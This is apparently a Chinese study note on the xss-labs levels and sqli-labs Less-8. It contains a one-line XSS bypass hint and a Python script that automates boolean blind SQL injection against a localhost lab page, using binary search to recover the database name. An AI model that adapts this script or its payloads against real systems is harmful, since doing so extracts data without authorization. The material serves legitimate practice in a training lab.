Xss-labs 1-8
- 发现>、<都被过滤掉了,但是没有将预定义字符转义,需要用双引号进行属性闭合。
使用二分查找进行python实现自动化布尔盲注(sqli8
import requests
# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"
# 要推断的数据库信息(例如:数据库名)
database_name = ""
# 字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "
# 推断数据库名的长度
def get_database_length():
length = 0
while True:
length += 1
payload = f"1' AND (SELECT length(database()) = {length}) -- "
response = requests.get(url, params={"id": payload})
if "You are in..........." in response.text:
return length
if length > 50: # 防止无限循环
break
return 0
# 推断数据库名
def get_database_name(length):
db_name = ""
for i in range(1, length + 1):
left, right = 0, len(charset) - 1
while left <= right:
mid = (left + right) // 2
char = charset[mid]
payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "
response = requests.get(url, params={"id": payload})
if "You are in" in response.text:
left = mid + 1
else:
right = mid - 1
db_name += charset[right]
return db_name
# 主函数
if __name__ == "__main__":
length = get_database_length()
if length > 0:
print(f"Database length: {length}")
db_name = get_database_name(length)
print(f"Database name: {db_name}")
else:
print("Failed to determine database length.")